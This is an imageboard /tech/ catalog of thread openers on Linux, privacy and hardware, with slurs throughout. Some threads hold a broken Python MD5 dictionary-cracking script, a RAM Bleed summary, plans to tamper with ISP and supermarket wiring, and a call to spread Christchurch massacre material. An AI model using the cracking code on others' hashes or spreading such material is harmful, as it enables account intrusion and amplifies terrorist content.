For reasons I can't go really much into I need some way of encrypting a bunch of old data, namely on some external drives. What are some good tools to do it?

Also, encryption general, I guess. Sorry for the double post, if it bothers you.

R: 18 / I: 0 / P: 12 [R] [G] [-]

Proton VPN


Lets vote for a non 5 eyes country!

R: 36 / I: 10 / P: 12 [R] [G] [-]

is neuralink just another musk meme?

R: 10 / I: 0 / P: 12 [R] [G] [-]

Is rison (irc) a honeypot? And if it is what irc servers aren't ? :^)

R: 150 / I: 17 / P: 12 [R] [G] [-]

Stallman Going SJW on us?

From Stallman's personal website: https://stallman.org/articles/genderless-pronouns.html

>Writing or speaking English, we always face a conundrum when we need a pronoun to refer to a person without specifying gender. Previously we needed a way to cover both male and female; nowadays some people state that they don't want to be considered either of those.

>Use an artificial new pronoun such as "ey" or "zhe". This solution works, and avoids the confusion of using "they", but people reject those pronouns because they do not fit naturally into English.

Stallman brings up various ways to solve the "genderless" issue. Using he/she doesn't quite cut it, since some people don't associate with either. Plus, it's "bureaucratic".

Here is my take on it. Use he or she depending on the person's sex, not gender. That solves almost all problems. There is only one problem. Which one do you use to refer to a hypothetical, imaginary person? Simple; use whichever. It's not a big deal... We are already doing it.

This article, along with other stuff on Stallman's personal website, makes me wonder if he is turning left, or whether he was always turned towards leftist politics. For example, he literally has a link towards an article about Bernie Sanders, and the link reads "Bernie Sanders for President". To be clear, that's not the article's title; that's just how Stallman named the link.. To be fair, there's another link titled "Support the Green Party". To wrap up, I respect Stallman, but I think articles dealing with pronouns is beneath him.

R: 162 / I: 13 / P: 12 [R] [G] [-]

Google Blocks Huawei From Using Android on Phones


>Huawei has been blocked from using Google software on its phones, dealing a huge blow to the Chinese tech giant. New Huawei-made phones will not have access to apps such as Gmail, Google Maps and the Google Play store. Existing phones will still have the apps but users will not be able to upgrade to newer versions of the Android operating system.

>Huawei can still use Android’s open-source alternative but it will not include Google’s own-brand apps such as Gmail. Google’s move comes after President Trump banned Huawei from U.S. networks, and the firm said today it was taking ‘steps to comply with recent government actions’.

>The move from Google deals a major blow to the expansion of Huawei and is likely to cripple its expansion.

<This is an unprecedented move that ostracizes what may currently be the best phone manufacturer in the world. Consider that there is no alternative. Phones are either iPhones with iOS or Android devices. No matter how good of an alternative to these Google apps Huawei makes, the fact that their phones don’t have official Google apps will definitely influence people looking for a new phone.

>Huawei confirmed it has developed its own operating system that could replace Google’s Android and Microsoft’s Windows should it be barred from using American-made products. The prospect of being banned from such products has intensified for Huawei in the wake of its recent lawsuit against the US government.

>“We have prepared our own operating system. Should it ever happen that we can no longer use these systems, we would be prepared,” Huawei executive Richard Yu said.

Could this be a chance for a non-Google fork of Android to enter the mainstream market?

R: 233 / I: 20 / P: 12 [R] [G] [-]

Did he win?

>systemd is now the default for most Linux distros

>alternatives to the components of systemd are dying

R: 77 / I: 8 / P: 12 [R] [G] [-]

Linux is a failure: Void edition

>want to install linux

>choose lean and systemd free one: Void Linux

>run Void live cd

>there is no "install" icon on desktop or start menu

>read fucking manual, you have to put some stupid command into terminal to install it

>open installer

>installer doesn't format disk for you

>read fucking manual how this shit wants my filesystem to look like



>there is no GUI tool to set network configuration

>read manual, idiots tell to modify some stupid file

>open file manager, icons are empty, broken

>also toolbar icons are missing

>browse to folder where the file is located

>double click on it

>it asks me which program to use when opening this file, there is no text editor, this shit doesn't bundle with text editor

>open some shitty "vi" in terminal with this file

>try to write something

>when you want to move cursor it does some crazy things, you cannot go back to your line and continue writing

>there is no interface or explanation what to press on keyboard

>don't even know how to close this vi shit

>instead turn off PC

>proceed to remove linux shit from your disk

R: 40 / I: 3 / P: 12 [R] [G] [-]

meshnet discussion

What are /tech/'s thoughts on the feasibility of a global meshnet as an alternative to the internet?

I have to say, updating the *Internet as a platform* is an interesting idea. We all eventually replace or update or patch our internet-connected devices, why not also the means that makes them useful? When considering the internet as a platform, how would you improve it?

I am particularly interested in this idea not only for the fact that it would mitigate censorship and allow universal access but also because i have come to realize that the Internet is the great equalizer in the digital age. Anyone can log on and find an answer; start a business; find a home; hire an employee; and so on.

As i see it, an alternative internet is an opportunity for humanity to create something truly special, a non-natural resource that is unlimited and free. De-centralizing such a powerful resource would, in my opinion, be the only way ensure its endurance in the future as a resource that connects and informs.

I would love to hear some other perspectives on the topic. For me, I want to be free from interference.

R: 18 / I: 0 / P: 12 [R] [G] [-]

Anonymous Asynchronous Network

Today I woke up thinking about doing a new network. I thought such thing could be fun even if only I use it to connect my computers.

The most distinctive feature would be the asynchronous packets. A node can send a packet to disconnected node, and this packet would be stored (for a limited time) by intermediate nodes until it could be delivered. Of course, the packets would be end-to-end encrypted to prevent the routing nodes from reading the content.

Now, I'm in doubt about a point. Should the network be anonymous? I think this could be achieved by identifying the destination node with a code that only this node would recognize (think of something like an RSA signature) and each packet must be distributed and stored only its claimed. But them, how can a DoS be mitigated if you cannot identify the source? Of course, you can know the where the packets came from (the IP address if the network is on top of the Internet), but a clever attack would route the packets through different nodes in the network.

So, in short, opinions? Suggestions for reading? I will be checking the FreeNet because the cache capability may be something similar to what I describe as asynchronous packets.

R: 77 / I: 1 / P: 12 [R] [G] [-]

Would I really benefit from reading this?

I'm currently a Math Major. Will this distill most of CS? How will this compare to PAPL? https://papl.cs.brown.edu/2016/

R: 82 / I: 12 / P: 12 [R] [G] [-]

Programming Fonts

What makes a good programming font? Which font are you using and why?

R: 15 / I: 0 / P: 12 [R] [G] [-]

Dark theme is for LARPers

Even Linus uses light theme and gets work done.

Dark theme is only used by LARPing NEETs.

Prove me wrong, protip: you can't!

R: 15 / I: 0 / P: 13 [R] [G] [-]

Charles Koch and George Soros team up with Patreon, Mozilla, Pinterest and more to stamp out “hate”

https://reclaimthenet.org/charles-koch-and-george-soros-team-up-with-patreon-mozilla-pinterest-hate-speech/ or archived https://web.archive.org/web/20190615202323/https://reclaimthenet.org/charles-koch-and-george-soros-team-up-with-patreon-mozilla-pinterest-hate-speech/

Clearnet is doomed, better get the fuck out of it ASAP.

R: 41 / I: 2 / P: 13 [R] [G] [-]

is TOR compomised?

recently i have been having trouble confirming the PGP key for TOR; every-time it comes back as a negative match. is anybody else having this issue?

R: 46 / I: 2 / P: 13 [R] [G] [-]

How do you feel about the future of "GNU/Linux"?

R: 11 / I: 0 / P: 13 [R] [G] [-]


2 or 3 years ago I read a post in some random website by one of the lead developers behind arch saying something along the lines of "I don't know where you people come from, the entire purpose of arch was to test software, which includes having the most complete release of everything in its latest version by default so that we can test it, if you're looking for a minimalist distro you picked one that directly opposes your goals"

I can't find it now, does anyone have a link to it?

R: 16 / I: 0 / P: 13 [R] [G] [-]

I stumble upon this every now and then.

Is this true?

What's the backstory?

R: 79 / I: 6 / P: 13 [R] [G] [-]

Input latency

Look at that lag. Lispmachinefags BTFO. It is literally slower than sending a packet across the planet.


R: 15 / I: 1 / P: 13 [R] [G] [-]

Is there any good Android web browser?

Brave is botnet and bloat.

Firefox same.

Everything other seems to be abandonware or retarded.

I currently use CuckCuckGo Browser, but looking for alternatives.

R: 29 / I: 2 / P: 13 [R] [G] [-]

Stealing Back the Internet


It's a sustainable actionable plan for stealing back the Internet. It's badly edited, badly put together and probably not complete, but it covers all the basis for getting started.

It's both a proposal and a request for feedback. I'll be making future editions as I refine it.

R: 25 / I: 1 / P: 13 [R] [G] [-]

I'm more of a C guy. What's the idiomatic C++11 or 14 way of doing this?

Usually in this situation I'd use a FILE* initialized to stdin and then if there was an argument in argv I'd fopen it, check the return and go on with my day.

I'm trying to use the stack to free things for me; RAII or whatever it's called. I don't really need real_fin hanging around if i'm operating on stdin obviously.

sizeof(real_fin) gives me 520

#include <iostream>
#include <fstream>

using namespace std;

main(int argc, char **argv)
istream *fin = &cin;
ifstream real_fin;
if (argc == 2)
if (real_fin.bad())
return 1;
fin = &real_fin;
cout << "dumping" << endl;
cout << fin->rdbuf();
cout << endl << "done" << endl;
return 0;

R: 22 / I: 3 / P: 13 [R] [G] [-]

Hey dudes. Long story short my isp hopped my fence almost a week ago now to work on pic related (underground cable box?) for what im assuming was to work on our neighbors internet (it has their address on it, not mine). While he was back there he fucked up my internet somehow and customer support is refusing to believe that they did that because its "against policy" to hop fences and is being extremely difficult while i try to get a tech out out here.

TL;DR can i open one of these and turn my internet back on myself? Are there sensors or anything like that that detect tampering?

R: 16 / I: 3 / P: 13 [R] [G] [-]

NYT Reports US has put Killswitch into Russian Electric Grid

I believe this is /tech/-related. The NYT Reports US has put Killswitch into Russian Electric Grid. The President has publicly stated that this misinformation he believes is an act of Treason.

NYT Article U.S. Escalates Online Attacks on Russia’s Power Grid, the origin of the report, going into technical details: https://archive.is/NZihH

An RT Response titled Hack away! NYT says US planted CYBER KILL SWITCH in Russian power grid… media shrugs: https://archive.is/iR7YW

I am reminded of 2018 when Bloomberg reported that China implemented tiny spying devices disguised as transistors in the US Mil's Mainframes, and no proof followed.

R: 85 / I: 14 / P: 13 [R] [G] [-]

A website where people control an online computer



R: 11 / I: 3 / P: 13 [R] [G] [-]

Debian 10 Buster-based Endless OS 3.6.0 Linux distribution now available

By Brian Fagioli

When it comes to Linux, I prefer my distributions to be no-nonsense -- Fedora is my favorite distro, for instance. Is Fedora boring? Yes, I suppose. But that is sort of why I like it. Look, I just want the damn operating system to take a backseat to my actual work. Fedora with GNOME allows me to focus on my tasks without getting in the way.

Understandably though, some Linux users like to "distro hop" where they are constantly moving between distributions, always wondering if the grass is greener on the other side. And yeah, I get that -- new is fun. People want excitement.

Well, one distro called "Endless OS" has been causing quite the stir in the Linux community thanks to its Debian base and beautifully tweaked GNOME desktop environment. It truly feels like an operating system designed for those who grew up in the smartphone era. It's not radical, but it definitely has sort of a mobile feel without losing focus on functioning as a desktop OS.

Today, Endless OS 3.6.0 sees release, and many Linux users are sure to be excited. It is based on the upcoming Debian 10, which is code-named "Buster." In other words, the included packages are rather bleeding edge.

"Endless OS is based on the GNOME desktop environment , the Debian GNU/Linux distribution, and the Linux kernel. In this release, we have updated the base OS packages to the latest versions from Debian 'buster' (the forthcoming stable release), most desktop components to the versions from GNOME 3.32, and Linux kernel 5.0. This brings new features, performance improvements, hardware support and bug fixes," says The Endless Team.

The team further says, "Previously, when you installed a new app, it was downloaded from the internet to your disk, then copied to a different location on the disk. As a result, you temporarily needed twice as much free disk space as the size of the app in order to install it, and the app was saved to disk twice. Endless OS 3.6 includes a new version of the Flatpak app distribution system with a new performance improvement, developed by Endless and Red Hat, which allows apps to be installed and upgraded without this additional copying step."

The Endless Team shares more changes below.

Endless companion app support removed -- The Endless companion app for Android was removed from the Google Play Store some time ago; while it was available, several users reported problems connecting the app to their Endless OS computer. We are currently focusing our efforts on other parts of Endless, so we have removed support for the app from Endless OS to save users’ disk space. We hope to bring this back in a future release, as time permits.

Reduced boot flicker on Intel graphics -- If your PC uses Intel graphics, the boot process will appear a little smoother than before, with fewer momentary flashes to black screens.

Updated Wacom graphics tablet support -- Advanced features and configuration of the latest Wacom graphics tablets should now be possible. (Graphics tablets are input devices that allow the user to draw graphics with a pen-like stylus.)

Desktop accessible after closing and opening laptop -- In past releases, with no applications open, closing the laptop lid, opening the lid again, and unlocking the screen would leave the desktop icons faded out and unusable until you click “Show Desktop” or interact with some other part of the UI. This has been fixed.

If you want to give Endless OS 3.6.0 a go, you can download it here. There are essentially two versions from which to choose -- Basic and Full. Don't worry, both are entirely free. The Full variant is what I would recommend, as it has a lot of useful free software included. Of course, that makes the ISO quite large -- it is more than 16GB while the Basic version is around 2GB. If you have the internet bandwidth and the storage space, you might as well get the Full.


image filename: linux_user.jpg

Even Brian thinks you guys are fat soyboys.

R: 20 / I: 1 / P: 13 [R] [G] [-]

Reactos thread.

How stable is reactos today?

Can it be used on real hardware today?

R: 12 / I: 3 / P: 13 [R] [G] [-]


When did it turn into a surveillance shithole? It has gstatic, ganalytics and ads everywhere (8chan has their softserve bs but it seems to not track (no xhr/ frames)).

It's been around 8 years since I've gone there so I am out of the loop, but why and when did they go for profit.

R: 88 / I: 1 / P: 14 [R] [G] [-]

Gentoo capitulated to Stallman

The default set of accepted licenses has been changed [1,2] to:


This means that by default only free software and documentation

will be installable. The "FREE" license group is defined in the

profiles/license_groups file in the Gentoo repository. It contains

licenses that are explicitly approved by the Free Software Foundation,

the Open Source Initiative, or that follow the Free Software


The system wide default for the accepted licenses is controlled by

the ACCEPT_LICENSE variable in /etc/portage/make.conf, or it can be

specified on a per-package basis in /etc/portage/package.license.

For example, to allow the app-arch/unrar and sys-kernel/linux-firmware

packages to be installed, the following lines would have to be added

to /etc/portage/package.license:

app-arch/unrar unRAR

sys-kernel/linux-firmware @BINARY-REDISTRIBUTABLE

If you want to revert to the previous default, add the following line

to /etc/portage/make.conf:


This will permit all licenses, except End User License Agreements that

require reading and signing an acceptance agreement. Note that this

will also accept non-free software and documentation.

See GLEP 23 [3] as well as the make.conf(5) and portage(5) man pages

for the detailed syntax of the ACCEPT_LICENSE variable. Further

information about licenses can be found in the Gentoo Handbook [4]

and on the license groups wiki page [5].

[1] https://projects.gentoo.org/council/meeting-logs/20190210-summary.txt

[2] https://bugs.gentoo.org/676248

[3] https://www.gentoo.org/glep/glep-0023.html

[4] https://wiki.gentoo.org/wiki/Handbook:AMD64/Working/Portage#Licenses

[5] https://wiki.gentoo.org/wiki/License_groups

R: 17 / I: 0 / P: 14 [R] [G] [-]

Hey, Hi, Hello!

Is this still where the actual tech community for fullchan is? I dropped chan stuff when I picked up a fully functioning adult lifestyle, now I've ruined that so I'm here to ask for comments of a small video project I am making.


Any help would be greatly appreciated, I don't do tech nor video stuff if it weren't apparent.

R: 177 / I: 26 / P: 14 [R] [G] [-]


My story:

Last night, I uploaded in regards to the 2019 Christchurch Massacre the Facebook Live stream, the manifesto, and the PDF archived thread.

The Internet Archive removed the video of the 2019 Christchurch Massacure without notice. I emailed them asking why, and told them my intent to reupload. I did. When I woke up this morning, the video was taken down again. I discovered shortly after my account had been locked. I emailed a second time to inquire. Shortly after this email, I discovered that both the manifesto and the archived thread have been set to "required to log-in to view" and have been Geologically censored. The Metadata says France is the region it is not able to be viewed. This does not make sense.

I have sent three emails and not received a single reply. I decided to wait until now for a reply, because I expected now to be a reasonable deadline. They have not replied. As of now, the two remaining files are still censored, and the video is still deleted. I am still unable to log into my Internet Archive account. With this, I am hereby announcing a boycott of the Internet Archive until they stop this censorship!

Spread these flyers, I have contacted multiple media outlets about this censorship, as well as persons involved in high-tech cases such as the EFF whom I hope will side with me and help participate in this boycott. I hope to make a difference. I am but one man, and need help.

The URLs of the files that remain are here:



And the URLs of the video and reupload that are now down



Censorship is telling a man he can't have a steak just because a baby can't chew it

R: 12 / I: 7 / P: 14 [R] [G] [-]

RAM Bleed/Rowhammer bug

RAM Bleed

<RAM Bleed is a side-channel attack that enables an attacker to read out physical memory belonging to other processes.

<The implications of violating arbitrary privilege boundaries are numerous, and vary in severity based on the other software running on the target machine.

<As an example, in our paper we demonstrate an attack against OpenSSH in which we use RAM Bleed to leak a 2048 bit RSA key.

<However, RAM Bleed can be used for reading other data as well.

<RAM Bleed is based on a previous side channel called Rowhammer, which enables an attacker to flip bits in the memory space of other processes.

<We show in our paper that an attacker, by observing Rowhammer-induced bit flips in her own memory, can deduce the values in nearby DRAM rows.

<Thus, RAM Bleed shifts Rowhammer from being a threat not only to integrity, but confidentiality as well.

<Furthermore, unlike Rowhammer, RAM Bleed does not require persistent bit flips, and is thus effective against ECC memory commonly used by server computers.

<The trend towards increasing DRAM cell density and decreasing capacitor size over the past decades has given rise to a reliability issue known as Rowhammer.

<Specifically, repeated accesses to rows in DRAM can lead to bit flips in neighboring rows (not only the direct neighbors), even if these neighboring rows are not accessed.

<Attackers can exploit these cross process bit flips for a myriad of security breaches.

<Researchers have demonstrated how to abuse Rowhammer for privilege escalation, RSA modulus factorization, and more.

<Previous attacks exploited the Rowhammer effect to write (or flip) bits in the victim's memory.

<RAM Bleed is different in that it uses Rowhammer for reading data stored inside the computer's physical memory.

<As the physical memory is shared among all process in the system, this puts all processes at risk.

>Site: https://rambleed.com

>Paper: https://rambleed.com/docs/20190603-rambleed-web.pdf

>CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0174

R: 17 / I: 5 / P: 14 [R] [G] [-]

ITT post your desktops

Post your desktops, just no Windoze or macOS

Here's mine

R: 44 / I: 4 / P: 14 [R] [G] [-]

First Catalina hackintosh is KVM running on AMD

Just in time to remind people they don't need overpriced Apple or Intel hardware to run their shit

R: 198 / I: 61 / P: 14 [R] [G] [-]

Iconic & Reliable

What is 'the Casio F-91W' of other tech?

I.e., inexpensive, well-built, reliable, outdated, & iconic.

R: 205 / I: 17 / P: 14 [R] [G] [-]

LynxChan 2.2

For those who don't know, LynxChan is a new chan engine I have been developing for the past 4 years or so.

Today I started 2.2 beta. It's main feature is the comeback of archives. Not only threads can be archived manually, but also limits for replies can be set for threads to be archived automatically after these limits are passed and the thread is pruned.

On a smaller scale and a more technical aspect was the optimization of ram usage. It should have use 80% to 75% less ram. Boot times have been improved too. And the json api have been merged into the form api too, which should make for a more consolidated api.

R: 28 / I: 1 / P: 14 [R] [G] [-]

ultimate programming language for white people

is there some non-shit language that is compilable into machine code?

C and C++ are useless broken shit. C is the reason linux is such a failure. C++ was made by adding some random paradigms and shits into already shitty C.

so what do we have? Pascal and Object Pascal? Ada? anything else? which one to use?

R: 47 / I: 5 / P: 14 [R] [G] [-]

Robot Monk Delivers Buddhist Sermons at an Ancient Japanese Temple

To attract young worshippers, an ancient Japanese temple engaged an AI monk - Android Kannon - to deliver religious sermons in multiple languages.

The $900K robot, which was a collaboration between Kyoto’s Kodaiji temple and Hiroshi Ishiguro, an Osaka University intelligent robotics professor, provided its first sermon at the religious landmark on Feb. 23, The Daily Mail reported.


R: 31 / I: 6 / P: 14 [R] [G] [-]

vim is so small that it's big


R: 34 / I: 8 / P: 14 [R] [G] [-]

One year anniversary of Net Neutrality being repealed

Do you guys remember how things used to be before we lost it all? I guess the lesson here is to never take things for granted

R: 24 / I: 10 / P: 14 [R] [G] [-]


Consider the fox. It’s known for being quick, clever, and untamed — attributes easily applied to its mythical cousin, the “Firefox” of browser fame. Well, Firefox has another trait not found in earthly foxes: stretchiness. (Just look how it circumnavigates the globe.) That fabled flexibility now enables Firefox to adapt once again to a changing environment.

The “Firefox” you’ve always known as a browser is stretching to cover a family of products and services united by putting you and your privacy first. Firefox is a browser AND an encrypted service to send huge files. It’s an easy way to protect your passwords on every device AND an early warning if your email has been part of a data breach. Safe, private, eye-opening. That’s just the beginning of the new Firefox family.

Now Firefox has a new look to support its evolving product line. Today we’re introducing the Firefox parent brand — an icon representing the entire family of products. When you see it, it’s your invitation to join Firefox and gain access to everything we have to offer. That includes the famous Firefox Browser icon for desktop and mobile, and even that icon is getting an update to be rolled out this fall.

Here’s a peek behind the curtain of how the new brand look was born:


R: 410 / I: 34 / P: 14 [R] [G] [-]

UNIX Hater: I am Calling You Out


This is your thread. You can do and say whatever you want in this thread. Stop derailing other threads.

No one cares what you think about UNIX or C. You might think it fools anyone to larp around quoting yourself with based, but it doesn't. You've not proven any knowledge or proficiency beyond quoting insufferable usenet posts made by academics who were butthurt because they made poor choices with their careers. You aren't posting any facts to support your opinion, so your opinion is shitposting and is against the rules.

>No spamming, sagebombing, shitposting, unwarranted self-identification (ie. signatures, avatars, tripcodes), or making posts advertising or requesting any kind of currency (bitcoin, altcoin, USD, etc), referrals, boards, products, and/or services. Shitposting is defined as a post or thread that doesn't have any meaningful content, indecipherable text (ie. "lol u tk him 2da bar|?") or otherwise contributes nothing toward discussion (ie. posting just to announce sage). It does NOT mean "anything you don't personally like."

If you want to contribute to this board, then you need to have evidence to back up your claims.

You've already been called out about making your own OS. This was your response >>1035593

>I don't have enough time to dedicate to doing so.

You are a shitposter. If you want to shitpost, do it in your own shitty thread.

R: 12 / I: 1 / P: 15 [R] [G] [-]

New Facebook app will pay users to collect data on how they use rival apps

Facebook is launching a new app called Study which will pay users for their data following a series of scandals about the way the company acquires and handles users' data.

The company was criticised earlier this year when it was revealed to have paid children as young as 13 to install software on their phones which allowed it to collect data on how they used its competitors' apps.

Facebook disputed that the app "spied" on users as they had consented to its terms which allowed it access to every bit of activity on a phone - and participants were paid.

It added that parental consent had been received for the children who installed it.

The controversial programme was shut down following outcry over the app, which was only available on Android phones.

Apple had previously banned Facebook's market research app Onavo, which the social media company acquired for $120m (£91m) in 2014.

It has been reported that it was Onavo which allowed Facebook to spot the enormous growth in WhatsApp before acquiring it for $19bn (£14.5bn) just months later.

R: 18 / I: 3 / P: 15 [R] [G] [-]

Looking for Anti Virus

hi /tech/ , im looking for a anti virus software because im autistic and only had Malwarebytes Premium the whole time thinking its an anti virus program as well as anti malware. recommend any? 2 computer engineers i know suggested using the free version of Malwarebytes and to pay for Kaspersky

R: 15 / I: 1 / P: 15 [R] [G] [-]

Linux Uninstaller GUI > does one exist?

I'm tired of the usual:

apt-get remove --purge packagename

And every OS but Linux seems to have a thousand third-party uninstallers.

Before you ask me if I live under a rock, I mean is there something that's like GDebi, but with the opposite functions?

Should we make one?

R: 16 / I: 1 / P: 15 [R] [G] [-]

DEF CON Cancellation

Full of cringe and fallacious arguments.


>The DEF CON staff and I have mutually agreed that the DEF CON conference will be canceled this year and we will not be hosting future conferences. DEF CON has been an incredible experience for myself and many others and it is very difficult to make this announcement. But, it is time for us to move on to bigger and better things. Over twenty years ago, I organized a party for a small group of friends. That simple get-together spawned what is now the largest and most well known hacker convention. As I said, that was over twenty years ago. Myself, the staff and all the others that have contributed to making DEF CON what is have done a lot of growing, made careers, built businesses, started families. We're not teenagers with enough time on our hands to organize parties for our friends, let alone 10,000 of them.

>I'm sure you've noticed that some of our key staff have retired. It is very difficult to find replacements. The amount of time, frustration, sweat and tears involved makes it a job few will take on. I've considered passing the conference to a younger generation, one that has the time and energy to run it. But, it is just too large and complex for a green crew. I think that it is more fitting that we retire DEF CON now, while it is at its best, than let it collapse under its own weight.

>I've created this site to be the official announcement page. The existing DEF CON site, while it may still have activity, will be archived and retired. Discussion boards will be closed. It is important that we preserve what DEF CON was and its influence on the security community.

>I would like to take a few paragraphs to discuss how we should move forward in a post-DEF CON world and I think it is important for hackers to understand how the security landscape, and the Internet as a whole, has changed over the past few years.

>As I mentioned, all of us have grown since DEF CON started. As you grow, you to start to see the world in a more complex and mature manner. Blind idealism fades away and a mature practicality is realized. This is something we all go through as we enter adulthood, take on responsibilities and make our way in society. I've had a lot of changes in my life and outlook since I started DEF CON. I've had some serious struggles resolving the person I was and the person I've become. If you knew me when i was seventeen, you wouldn't have believed the organizations I ultimately worked for. You might have even called me a traitor to the hacker community! But, I guess that's my point. Things change.

>I believe that we are in a post-hacker world. We still need innovative security researchers but we need professionals. We need to shed the "hacker" persona that is denigrating us. We should strive to be professionals, making the Internet a safer place rather than exposing vulnerabilities that can be leveraged by criminals and terrorists. This is why I'm going to encourage you to attend professional security conferences like Black Hat, RSA, SANS and others instead of hacker conferences.

R: 32 / I: 2 / P: 15 [R] [G] [-]

Challenge: Code a basic hash cracker. Any language. Any hashing algorith.

I decided password recovery / cracking would be a good subject for starting people on security related topics. For you complete /newfags/ a hash is pretty much a one way cryptographic function that in most cases is not reversible. In any modern authentication a password hash is stored rather than a plaintext password.

When you punch in your password on a web application to login the application takes your plaintext and feeds it to a cryptographic function then checks to see if it is equal to the stored value if it matches then access is granted. This way the application can function without every knowing your password.

Purpose of cracking a password hash. Recover a plaintext password user who forgot his password. There are a ton of application that can do this and I will discuss some of that later. Right now I just want to drop the basic concepts.

I'm going to do a dictionary attack against an MD5 hash for demonstration purposes. I'll go over the steps. It's actually pretty simple.

Legal disclaimer. Don't break into other people's computer systems or networks unless you have permission. You put on your own pants in the morning and you know the difference between right and wrong. If you don't know the laws where you are at look them up or consult an attorney before penetrating computers or networks that you do not own.

Alright let's have some fun.

import sys
import hashlib

myhash = sys.argv[1]
thehash = myhash.strip()
dictionary = sys.argv[2]

with open(thedic, 'r') as fa:
for pwd in fa:
newhash = hashlib.md5(pwd.encode("utf-8")).hexdigest()
print 'Trying password ' + pwd.strip() +' ------> '+ newhash.strip()
if newhash == thehash:
print '\n\n\n\nPassword Found! '+pwd.strip()

R: 11 / I: 1 / P: 15 [R] [G] [-]

Hardware Gore

Post some of the worst PC's on the interwebs... Like properly rage inducing shit.

R: 14 / I: 1 / P: 15 [R] [G] [-]

Open Hardware - HDD

French faguette here

Our national cybersecurity agency just released a open hardware USB hard drive disk. It also automatically encrypts itself.


Open hardware is rather hard to make, do you think that it will come from our governments ? Will it be trustable if another vendor sells it ? As it's open harware, they could easily modify it to spy on you.

So, is it a good thing or not in your opinion ?

R: 23 / I: 1 / P: 15 [R] [G] [-]

Tonight I decided to quit gaming and install Solus.

Am I a giant faggot?

Should I have just installed gentoo or BSD?

R: 162 / I: 20 / P: 15 [R] [G] [-]

RMS was always right: Adobe Tells Users They Can Get Sued for Using Old Versions of Photoshop

>Adobe is warning some owners of its Creative Cloud software applications that they’re no longer allowed to use older versions of the software. It’s yet another example of how in the modern era, you increasingly don’t actually own the things you’ve spent your hard-earned money on.

> Adobe this week began sending some users of its Lightroom Classic, Photoshop, Premiere, Animate, and Media Director programs a letter warning them that they were no longer legally authorized to use the software they may have thought they owned.

>“We have recently discontinued certain older versions of Creative Cloud applications and and a result, under the terms of our agreement, you are no longer licensed to use them,” Adobe said in the email. “Please be aware that should you continue to use the discontinued version(s), you may be at risk of potential claims of infringement by third parties.”
























R: 57 / I: 3 / P: 15 [R] [G] [-]

OSX/iOS Memory management


>To give processes access to their entire 4 gigabyte or 18 exabyte address space, OS X uses the hard disk to hold data that is not currently in use. As memory gets full, sections of memory that are not being used are written to disk to make room for data that is needed now. The portion of the disk that stores the unused data is known as the backing store because it provides the backup storage for main memory.

>Although OS X supports a backing store, iOS does not. In iPhone applications, read-only data that is already on the disk (such as code pages) is simply removed from memory and reloaded from disk as needed. Writable data is never removed from memory by the operating system. Instead, if the amount of free memory drops below a certain threshold, the system asks the running applications to free up memory voluntarily to make room for new data. Applications that fail to free up enough memory are terminated.

>Unlike most UNIX-based operating systems, OS X does not use a preallocated disk partition for the backing store. Instead, it uses all of the available space on the machine’s boot partition.

I found this approach to memory management intriguing because of how much it differed from standard Linux/Windows use of swap and virtual memory

The tl;dr is this;

>OSX does not use swap per se but rather treats the entire main storage as a giant backing store

>In iOS Inactive data is never sent to the backing store since iOS doesn’t use one, instead, even if RAM is getting full, the OS asks applications to free up data (how this happens seems to be up to developers) and if the application cannot it is terminated as if there is an out of memory condition, read only application data is never loaded into memory, thus keeping RAM free for dynamically loaded assets at all times

The advantage to this approach is obvious, superior system responsiveness at any given time while avoiding core OS out of memory conditions avoiding system instability and also improving the life of solid state storage. The disadvantage is that it doesn’t favor many background processes and puts extra burden on application developers beyond simple garbage collection.

Would you ever want to see a comparable solution on GNU/Linux for mainstream user experience focused distros?

R: 32 / I: 6 / P: 15 [R] [G] [-]

ZFSonLinux adopts a CoC, everyone hates it, gets pushed anyways

What's more, they tried to hold a fake discussion about it to show how everyone likes the idea, after the thread goes south, they lock the thread and push the commit anyways, because your opinion doesn't mean shit, I have a blue hair cat lady I need to score good boy points with.


R: 14 / I: 10 / P: 15 [R] [G] [-]

Programs used to create Anime

Hi, I would like to identify some programs used to create Anime. I saw behind the scenes how the 5 episodes of 6HP (6 Hearts Princess) were made and I was left wondering which programs they used. I understand that many animation studios use Retas Pro HD, but the programs used in the documentaries I could only identify Photoshop.

If someone can identify these programs, it would be very helpful for all those who like animation and want to be clear about the "Work flow" of the process.

R: 14 / I: 0 / P: 15 [R] [G] [-]

I got a dumbass ingenious idea, hear me out.

Seeing how you can't trust a VPN to save your soul and how I have a couple of old routers just lying around I got a gnarly idea of making my own VPN and then hiding it in the ceiling tiles of my old local supermarket bathroom whilst hooking it up to the lighting 220 volts.

Basically one afternoon of fucking around on OpenWRT, making clamps (well insulated for me) to clamp onto the light in the ceiling tiles and basically have my own "free" VPN that I connect to through Tor.

Might as well buy a new router, hand in cash to local selling app fucker just to make the serial number that less traceable to me.

Whatchu think?

That or the library.

(btw all pics are for reference, I aint putting any info on here)

R: 15 / I: 2 / P: 15 [R] [G] [-]

Why is there such an increase in shitty "day in the life of a female software engineer" videos?

Literally NONE of these videos show anything related to software engineering or programming.


R: 21 / I: 3 / P: 15 [R] [G] [-]

There is a profile on twitter spamming coded messages every couple minutes. People over at 4chan were seeing if terms like milkshake had any coded pedo-meanings and found this account that way. They think it has something to do with pizza gate. /pol/ told me to come here for help.

Any good autists here?

R: 46 / I: 5 / P: 16 [R] [G] [-]

imposter syndrome

What would be the most efficient yet comprehensive way for a codemonkey to go back and learn the foundations of CS? I'm about half a decade in to being a codemonkey cog helping corporations shit out enterprise software, I never had an academic background in CS (I didn't even go to college due to fucked family situation). Everything I know about computers is learned from online courses designed to get you from 0 to functionally useful at some soulless corp (think youtube tutorials narrated by some barely intelligible pajeet, udemy, lynda, etc.), and every technical interview I've ever passed was purely due to mindlessly "grinding" toy problems on sites like 1337code.

In short, I feel like a total fraud next to people with actual degrees/academic background in programming and it makes me insecure and depressed. I would like to once and for all, do what it takes to gain a deep foundational understanding of computer science, but am at a loss as to where to start. Should I just go through the entirety of ossu? Is there a list of books I should read? I feel lost and overwhelmed at the choices which I guess is part of what getting an actual degree helps to mitigate. Expect to get shit on but hope some of you will understand and point me in the right direction

R: 179 / I: 15 / P: 16 [R] [G] [-]

Social interaction post 2008

Remember in 2008, we would be able to find general communities for various different hobbies, video games, technology, arts, sports, now all that has been swallowed up by giant corporations which breed homogeneous, unoriginal behavior due to being accessible by the unoriginal masses who obey the law of social norms.

Are there still any communities around?

R: 52 / I: 10 / P: 16 [R] [G] [-]


